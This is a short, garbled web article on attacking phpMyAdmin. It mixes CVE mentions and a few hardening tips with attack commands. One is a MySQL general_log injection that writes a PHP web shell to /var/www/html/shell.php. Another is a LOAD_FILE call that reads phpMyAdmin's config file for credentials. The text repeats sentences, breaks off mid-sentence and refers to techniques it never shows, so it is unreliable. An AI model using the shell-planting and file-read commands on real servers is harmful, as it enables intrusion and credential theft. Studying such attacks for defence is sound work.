Hacktricks Verified: Phpmyadmin

Though rare in recent versions, older phpMyAdmin releases had SQL injection vulnerabilities in its own interface (e.g., CVE-2015-2208, CVE-2016-6628). Attackers could bypass login or execute arbitrary queries without valid credentials.

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT "<?php system($_GET['c']); ?>";

If not actively needed, remove the phpMyAdmin folder or rename it to a non-obvious name. Use HTTPS: Never use HTTP for database administration. 🔒 Security Advisory phpmyadmin hacktricks verified

phpMyAdmin remains a popular entry point for attackers, but its "hacktricks" are well-understood and . The techniques above – from default credentials and LFI to file-based RCE and log injection – have been tested against real-world versions. For defenders, verifying these attack paths in your own environment is the only way to ensure you are truly secure.

LOAD_FILE('/etc/phpmyadmin/config.inc.php'); Though rare in recent versions, older phpMyAdmin releases

If current user has CREATE USER and GRANT privileges:

: Multiple versions have been susceptible to SQLi. For instance, CVE-2020-5504 affects versions prior to 4.9.4 and 5.0.1 , allowing attackers with a MySQL account to manipulate queries through the 'username' field on the user accounts page. Use HTTPS: Never use HTTP for database administration

phpMyAdmin allows arbitrary file reads when the "open_basedir" restriction is not enabled. An attacker can read sensitive files to extract sensitive information.